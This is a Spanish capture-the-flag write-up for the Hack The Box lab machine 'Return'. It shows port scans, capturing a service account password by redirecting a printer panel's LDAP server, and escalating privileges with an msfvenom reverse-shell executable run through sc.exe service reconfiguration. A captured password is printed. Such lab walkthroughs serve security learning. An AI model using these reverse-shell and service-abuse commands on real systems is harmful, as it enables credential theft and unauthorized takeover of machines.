Return HTB Write Up

Información del Objetivo

IP de la Máquina: 10.10.11.108

Dominio: return.local

1. Reconocimiento Inicial

1.1 Escaneo de Puertos

sudo nmap -sS -p- --min-rate 5000 -n -vvv -Pn --open 10.10.11.108 -oG allPorts

nmap -sCV -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49674,49675,49679,49686,49697,58403 10.10.11.108 -oN targeted

Siguiendo esa captura de pantalla, agreguemos estos hosts a nuestro /etc/hosts:

echo "10.10.11.108 return.local" | sudo tee -a /etc/hosts

2. Explorando la Interfaz Web

Echemos un vistazo al puerto 80. Aquí podemos ver que hay una impresora en la que podemos modificar la Dirección del Servidor.

Así que, en lugar de esa Dirección del Servidor, intentemos configurar nuestro servidor malicioso. Actualicemos la configuración.

2.1 Interfaz de la Impresora – Manipulación de la Dirección del Servidor

Así es como lo hago.

Luego, en mi Kali, lo configuro para escuchar en el puerto 389 y cuando hago clic en actualizar, obtengo la contraseña del usuario svc-printer.

3. Obteniendo Acceso Inicial

Veamos si es una contraseña válida. Para ello, la probé via nxc con el siguiente comando:

3.1 Verificando Credenciales

nxc ldap 10.10.11.108 -u svc-printer -p'1edFg43012!!'

Y es una contraseña válida, como podemos ver dice Pwn3d!, esto significa que podemos iniciar sesión via winrm. Así que continuemos.

4. Escalada de Privilegios

Iniciemos sesión y listemos sus privilegios con el comando whoami /priv. Aquí podemos ver que tenemos varios privilegios habilitados.

Primero que nada, con este comando generé una reverse shell en formato .exe.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f exe -o rev.exe

Luego la subí a la siguiente ruta.

Luego ejecuté los siguientes comandos.

sc.exe config VSS binpath="C:\Windows\Temp\rev.exe"
sc.exe stop VSS

Aquí configuramos nuestro listener con nc -lnvp 4444

sc.exe start VSS

Y aquí recibimos la conexión de vuelta.

Autor: Astro